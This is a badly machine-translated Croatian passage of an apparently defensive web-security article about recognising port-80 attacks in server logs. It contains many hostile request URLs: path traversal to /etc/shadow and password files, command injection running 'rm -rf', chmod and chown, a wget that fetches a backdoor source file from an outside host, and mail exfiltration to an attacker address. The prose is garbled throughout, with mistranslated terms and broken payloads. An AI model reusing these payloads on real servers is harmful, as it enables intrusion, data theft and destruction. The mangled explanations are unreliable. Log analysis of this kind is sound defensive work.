I. Sažetak
II. Detaljan opis
III. Daljnji
IV. Prelijevanje Analiza
V. Transcoding
VI. Zaključak
[Sažetak]
web site 80 kao luka zadani poslužitelj, o raznim sigurnosnim problemima drzite ga dalje od izdanju, neke od tih ranjivosti omogućuju napadaču da dobije čak i administratoru sustava dozvolu za ulazak stranica sama, Evo nekih 80 luka Zenomorph tragovi napada istraživanja, i reći vam kako pronaći probleme iz log zapisa.
[Detalj]
Ovdje dijelom kroz brojne Liezi prikazivati na web poslužitelji i aplikacije na svojim opći napad, a svoje tragove, koji predstavljaju samo Liezi veliki napad, ne postoji popis svih oblika napada, ovo poglavlje će se Detaljan opis uloge svakog napada, a kako iskoristiti ove ranjivosti za napad.
(1) "." ".." A "..." upit
Tragovi tih napada su vrlo uobičajena za web aplikacija i web server, koji se koristi kako bi se omogućilo napadaču ili crv-virus plan to Chanel web server put, da bi se pristupilo zatvorenih prostorija. Većina CGI programi s ovih nedostataka, ".." zahtjev.
Primjer:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
To pokazuje zahtjeva napadač Liezi mosd ovu datoteku, ako je napadač web sposobnost proboja root direktorij poslužitelja, a zatim dobiti više informacija i za dobiti dodatne povlastice.
(2) "% 20" zahtjev
% 20 je hex vrijednost koje je 16 mjesta, iako to ne znači da možete koristiti bilo što, ali kad te pogled zapisnik, naći će ga, neki web server aplikacija trčanje na ovaj lik može učinkovito provoditi Stoga, trebate pažljivo pregledati zapisnik. S druge strane, zahtjev ponekad može pomoći da obaviti neke naredbe.
Primjer:
http://host/cgi-bin/lame.cgi?page=ls% 20-sur |
To pokazuje Liezi napadaču da izvrši naredba Unix, navodeći cijeli katalog dokumenata zatražio, uzrokujući napadaču pristup važan kartoteka na temelju tvoj sistem, koji će mu pomoći da dodatno osigurati uvjeti za dobivanje pogodnosti.
(3) "00%" zahtjev
00%, rekao je 16-byte heksadekadski prazna, mogao je to luđak web aplikacija, a zahtjev za različite vrste datoteka.
Primjeri:
http://host/cgi-bin/lame.cgi?page=index.html
To može biti valjan zahtjev u stroj, ako je napadač svjesni ovaj zahtjev je bio uspješan, on je dodatno će tražiti CGI postupke.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Možda CGI program ne prihvati ovaj zahtjev jer je zahtjev za provjeru datoteke sufiks, kao što su: html.shtml ili druge vrste datoteka. Većina programa će vam reći zatražio tip datoteke nije ispravan, ovaj put to će reći napadača zahtjeva datoteka mora biti karakter sufiks tip datoteke, pa napadač može dobiti sustav put, naziv datoteke, što je rezultiralo sustav više osjetljive informacije
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Pozornost na taj zahtjev, on će varati CGI program koji je ovaj dokument kako bi se utvrdilo prihvatljive vrste datoteka, neke programe učinkovitog nadzora i glupo zahtjev datoteka, koji se obično koristi metoda napadača.
(4) "|" zahtjev
To je cijev karakter, u UNIX sustavu, zahtjev za pomoć u provedbi nekoliko naredbi sustava u isto vrijeme.
Primjer:
# Mačka access_log | grep-i ".."
(Ova naredba će prikazati prijaviti ".." zahtjev se obično koriste u napadima i crvi rezultata)
Često naći da mnoge web aplikacije koriste ovaj lik, što je dovelo do greška klada IDS alarm.
U pažljivog proučavanja Vašeg zahtjeva, tako da prednost smanjuje lažne uzbune u sustavima za otkrivanje upada.
Ovdje su neke od Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Ovaj zahtjev naredba, sljedeće su neke promjene u Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-sur% 20/etc |
Ovaj zahtjev je navedena u sustavu Unix / etc direktoriju svih datoteka
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20% 20-ja "hrom"
Izvršenja naredbe mačka zahtjeva i provedbu grep naredba će također, provjeriti "hrom"
(5) ";" zahtjev
U Unix sustavima, ovaj lik dopustiti mnogostruk komandna linija izvršenje
Primjer:
# ID; uname-
(Provedba id naredbe, nakon čega slijedi provedba uname naredbe)
Neke web program s tim likom, može rezultirati u vašem IDS zapisnicima upozorenje od neuspjeha, trebate pažljivo provjerite svoje web plan, tako da ćete smanjiti rizik od neuspjeha IDS upozorenja.
(6) " " i " " Zahtjev
Trebali provjeriti logove rekord dva lika, iz više razloga, prvi je znak koji je dodao podataka u dokumentu
Primjer 1:
# Echo "svoj hax0red h0 h0" / etc / motd (motd upit pismene Informacije u ovom dokumentu)
Napadač lako može koristiti kao zahtjev za manipuliranje gore Vaše web stranice. Kao što su poznati RDS iskorištavanje napadača često se koristi za promjenu web stranicu.
Primjer 2:
http://host/something.php=Hi 20mom%%% 20Im 20Bold!
Html primijetit ćete da je jezik znakova ovdje, on je također proveo " "," " znakova, takvih napada ne može izazvati napadaču pristup sustavu, ona zbunjena ljudi misliti ovaj je legitimna web stranica informacija (što dovodi do Ljudi posjetite ovaj link za posjetu napadača postaviti adresa, taj zahtjev može biti kodirani na 16 hex znakovi u obliku, tako da tragovi napada nije tako očito)
(7) "!" Zahtjev
Zajednički jezik na ovaj SS znak zahtjeva (Server Side Include) sam napad, ako napadač je napadač zamijeniti korisnik klikne na link set, i isto kao gore.
Primjer:
http://host1/something.php =
Lieh-tzu se napadač može to učiniti na datoteku na mjestu host2 iz host1 pojavljuje iznad (naravno, zahtijevaju posjetitelje da posjetite napadača postavke veze. Ovaj zahtjev se može pretvoriti u 16 hex kodiranje masku, nije lako naći)
U isto vrijeme, ovaj pristup također može realizirati web stranica ovlasti zapovijedanja
Primjer:
http://host/something.php =
Lieh-izvoditi na udaljenom sustavu "id" naredbu, ona će se prikazati upute za web stranice ID, obično "niko" ili "www"
Ovaj obrazac također omogućava uključene skriven kartoteka.
Primjer:
http://host/something.php =
Skrivene datoteke. Htpasswd neće biti prikazan, Apache će odbiti uspostaviti takva pravila da. Ht obrazac zahtjeva, i SSI logotip htijenje zaobići ta ograničenja, i dovesti do sigurnosnih problema
(8) "," Zahtjev
Takve napade pokusava se daljinski umetanje PHP web aplikacija postupcima, može dozvoliti izvršenje narudžbe, ovisno o postavkama servera, i drugim čimbenicima na radu (kao što je php je postavljen na siguran način)
Primjer: http://host/something.php = passthru ("id ");?
U nekoliko jednostavnih php aplikacija, može se u udaljenom sustavu za web stranice korisnik povlastica Native Command
(9) "` "zahtjev
Ovaj lik je kasnije koristiti za izvršavanje naredbi u perl, znakova u web aplikacije se ne često koristi, pa ako ga vidite u log, bi trebali biti vrlo oprezni
Primjer:
http://host/something.cgi = `id`
Napišite Perl CGI program u pitanje bi dovelo do provedbe id naredbe
[Više]
Sljedeće poglavlje će se raspravljati o provedbi više napada mogli naredbu, zajedno s dokumentima zatražio, a ako ste udaljeni pogreška izvršenja naredbe, to bi trebalo biti kako provjeriti otkriće. Ovaj dio je samo da vam dati dobru ideju, i recite svoj sustav što se događa, napadači pokušavaju napasti tvoj sistem tragova, ali ne popis svih napadača na korištenje naredbe i zahtjeve.
"/ Bin / ls"
Ova naredba zahtjeva cijelu stazu, u mnogim web aplikacije su ove rupe, ako se prijavite na mnogim mjestima takav zahtjev, moguće je za velike daljinsko izvršenje naredbi ranjivost, ali ne nužno problem svibanj isto tako biti lažan alarm. Još jednom podsjetio, web aplikacija napisana (CGI, ASP, PHP ... itd) je temelj sigurnosti
Primjer:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-sur |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Ovo je prozore ljuske, ako napadač na pristup i pokrenete ovu skriptu u podešenja poslužitelja pod uvjetima pušenje u Windows stroj može učiniti ništa, mnogo crva je kroz port 80, komunikacija na udaljenom računalu
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
To je dvije binarne datoteke, svoje probleme i / bin / ls, kao što je, ako se prijavite mnogim mjestima Zhezhongqingqiu, a postoji velika mogućnost Yuanchengzhixing Naredba Slabe točke, ali ne nužno problem svibanj isto tako biti lažan alarm.
To će pokazati koji dio pripada kojem korisniku i grupi
Primjer:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Ova naredba može izbrisati kartoteka sa ispravnu uporabu je vrlo opasan
Primjeri:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20% 20-rf * |
http://host/cgi-bin/bad.cgi?doh=rm% 20% 20-rf *;
"Wgeta i TFTP" naredba
Te naredbe su često napadač mogu steći dodatne ovlasti za preuzimanje datoteka, wget je Unix naredba pod, može se koristiti za preuzimanje backdoors, TFTP je pod zapovjedništvom Unix i NT, se koristi za preuzimanje datoteka. Neki IIS crva raširiše po tftp kopirati virusa na druge domaćine
Primjeri:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// domaćin / cgi-bin / bad.cgi? DOH =% 20http wget: / / www.hwa-security.net/Phantasmp.c;
"Mačka" naredba
Ova naredba se koristi za prikaz sadržaja datoteke, koriste za čitanje važne informacije, kao što su konfiguracijske datoteke, datoteke lozinku, kreditne datoteka i dokumenata koje se možete sjetiti
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = mačka% 20/etc/motd;
"Echo" naredba
Ova naredba se koristi za pisanje podataka u datoteku, kao što su "index.html"
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-kivija #%% 20was 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-kivija #%% 20was 20here"% 20 200day.txt%;
"PS" naredba
Popisi trenutno pokrenut postupak, recite da napadač udaljeno računalo trčanje softver kako bi dobili neke ideje o sigurnosnim pitanjima, za dobivanje dozvole za daljnje
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh ps =% 20-aux;
"Ubij i killall" naredba
Unix sustavima, kako bi se ubiti taj proces, napadač može iskoristiti ovaj naredba za zaustavljanje usluge sustava i procesa može obrisati tragove napadača, neke iskorištavati će proizvesti puno djece procesa
Primjeri: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" naredba
Ova naredba govori napadač udaljenog stroja ime, za neko vrijeme, putem ove web-stranicu kako bi saznali koji isp, napadač koji može biti posjetio je danas. Uname-a zatražiti normalno, ta bit će zabilježena u log datoteku
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-| http://host/cgi-bin/bad. cgi? doh uname =% 20-;
"Kopija, gcc, perl, python, itd ..." kompilaciju / tumačenje naredbe
Napadač kroz wget ili TFTP preuzimanje iskorištavati, i koristiti cc, gcc kompajler kompajlirati ovo u izvršni program, i dalje postavkama pristupa
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20% 2031337-p;
Ako ste vidjeli zapisnik pronađena "perl" python "Te upute mogu biti udaljeni napadač za preuzimanje perl, python skriptu, i pokušao dobiti privilegije lokalnog
"Mail" naredba
Napadači često koriste ovu naredbu sustava, neke važne dokumente na napadača vlastite spremnika, ali i spremni na e-mail bombaških napada se obavljaju
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, itd. ..." i druge naredbe
Unix sustavima, kako bi im dopustili da promijeni dozvole za datoteku
chown = omogućuje postavljanje datoteka vlasnik chmod = omogućuje da postavite dozvole za datoteku chgrp = omogućuje vlasniku da promijeni dozvole za grupu datoteka chsh = dozvoljeno promijeniti korisnički ljuske
Primjeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh chmod =% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd |% http://host/cgi-bin/bad.cgi?doh=chsh 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd 'datoteku
To je sustav 'lozinka datoteku, obično shadow off, i ne dopušta da vidi šifriranje lozinka, ali za napadača koji može znati što je valjan korisnik, i sistem' apsolutni put, site ime i druge informacije, kao što je obično po shadow off, pa napadač normalno će vidjeti / etc / shadow datoteci
"/ Etc / master.passwd"
Ova datoteka je BSD sustava lozinka datoteku koja sadrži lozinka kodiran, datoteku na root račun je samo samo za čitanje, a neki nekvalificirani napadača će se otvoriti sadržaj koji je pokušao pročitati., Ako je web stranica root privilegije za pokretanje, a zatim napadač je, možemo pročitati sadržaj iznutra, puno problema na administratora sustava će doći jedna za drugom
"/ Etc / shadow"
Sadrži lozinka kodiran sustav, pročitajte na isto root račun, i / et / master.passwd gotovo
"/ Etc / motd"
Kada korisnici prijavite na Unix sustavu, informacije se pojavljuje u "Message of the Day" datoteci, pruža važne informacije o sustavu i administrator korisnici nekih postavljena, korisnici koji žele vidjeti oni koji to nisu, Sustav također sadrži podatke o inačici, napadač se obično vidi ovu sliku, da shvate što sustav radi o napadaču, sljedeći korak je da se potraga za ovu vrstu sustava, iskorištavati, a daljnji pristup sustavu povlastica
"/ Etc / hosts"
Dokument daje IP adrese i mrežne informacije, napadač može saznati više o Network Settings
"/ Usr / local / apache / conf / httpd.conf"
Ovo je Apache web server oblik fascikl, napadač može razumjeti, kao što su CGI, SSI i ostale informacije dostupne
"/ Etc / inetd.conf"
To je oblik varalica inetd poslužitelj, napadač može naučiti udaljenom računalu, pokrenuti te usluge, da li koristiti omotu za kontrolu pristupa, ako je omotu je pronađena trčanje, napadač sljedeći korak će provjeriti "/ etc / hosts.allow" i "/ etc / hosts.deny", datoteka, a koje mogu promijeniti neke postavke, pravima pristupa
". Htpasswd,. Htaccess i. Htgroup"
Ove datoteke su obično web stranica Yongyu na autentičnost korisnika, napadač će te datoteke i dobiti korisničko ime i lozinku, lozinka fascikl. Htpasswd koja je kodirana u nekoliko jednostavnih krekera za dekriptiranje, omogućiti napadaču da pristup stranici zaštićenih područja (obično korisnik s istim korisničkim imenom i lozinkom, napadač čak može posjetiti drugi račun)
"Access_log i error_"
To su apache poslužitelja log datoteka, napadači često vidjeli ove datoteke, pogled na te zahtjeve zabilježeni, one i ostale zahtjeve za različita mjesta
Tipično, napadač može izmijeniti te klada kartoteka, kao što je njegov vlastiti podatke o adresi, napadač kroz luke 80 kroz svoj sustav, a rezervne sustav također ne radi, nema drugih zapisa programa zapis stanja sustava, koji će otkrivanje upada postaje vrlo teško raditi
"[Drive-slovo]: winntrepairsam._ ili [drive-letter]: winntrepairsam"
Windows NT sustava lozinka datoteku, ako je maknuti naredba ne može biti provedena, napadači su obično će zahtijevati te dokumente, onda "L0pht ispucati" na vrstu lozinka lamanje alata za prasak, ako napadač pokuša napasti upravnik 'lozinka datoteku, ako je uspješna onda maknuti stroj biti napadač ima kontrolu
[Overflow Analiza]
U ovom članku neću reći previše o prelijevanje temu, ja ću dati ono što one pojave i tragovi pažnje i od posebne važnosti, tampon često napadaju pretvorbe napadača kod i teško pronaći druge načine kako bi se postigla
Ovdje je jednostavan Liejeve Zi
Primjer: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Ovo Liezi prikazuje napadača na zahtjev poslati puno karaktera, za testiranje programa buffer overflow, buffer overflow mogu dobiti maknuti naredbe dozvole domaćin izvršenja, ako vlasnik ima setuid i procedure za root, kroz overflow, može dobiti pristup cijelom sustavu, ako ne kao setuid programa, onda je samo prelijevanje pokretanjem web-stranice korisničkih prava
Ovdje se ne može reći sve okolnostima, ali te redovito trebali provjeriti log datoteke, ako je taj dan našli mnogo zahtjeva, ali obično ne više od zahtjeva, to znači da se podvrgavaju overflow napada, naravno, mogu se novi mrežni crv napada
[Transcoding]
Svi napadi gore navedenih zahtjeva, napadač se obično zna IDS sustavi često mehanički provjerili zahtjev, obično je napadač će koristiti podatke pretvaranje alat to pretvoriti format sadržaja zatražio 16 benda, što je rezultiralo IDS će ignorirati te zahtjeve Mi smo upoznati s CGI ranjivost alat za skeniranje da je dobar Liezi zalistak. Ako ste vidjeli zapisnik vremena pronašao velik broj od 16-band, a ne neke zajedničke znakove, zatim napadač može pokušati iskoristiti neki od načina da napadne svog sustava
Brz način je log datoteka zahtjev za one hex 16, kopirajte ga na vaš preglednik, preglednik može pretvoriti u pravu zahtjev, i prikazuje sadržaj zahtjeva, ako ne hrabrosti da se ovaj rizik, jednostavan čovjek ASCII, mogu vam dati točan broj.
[Zaključak]
Ovaj članak ne može pokriti sve 80 luka napada, ali većina je naveo više od general napad, i reći how to check your log datoteke, a kako to add kao što su broj od IDS pravila, pisati her cilj is to Web administrator sustava treba biti zabrinuti o tome što dobro u isto vrijeme, nadam se da ovaj članak pomaže da se web programeri web program za pisanje boljih programa
NA NAPOMENA: Ako imate bilo kakvih komentara i sugestija, molimo pošaljite e-mail admin@cgisecurity.com.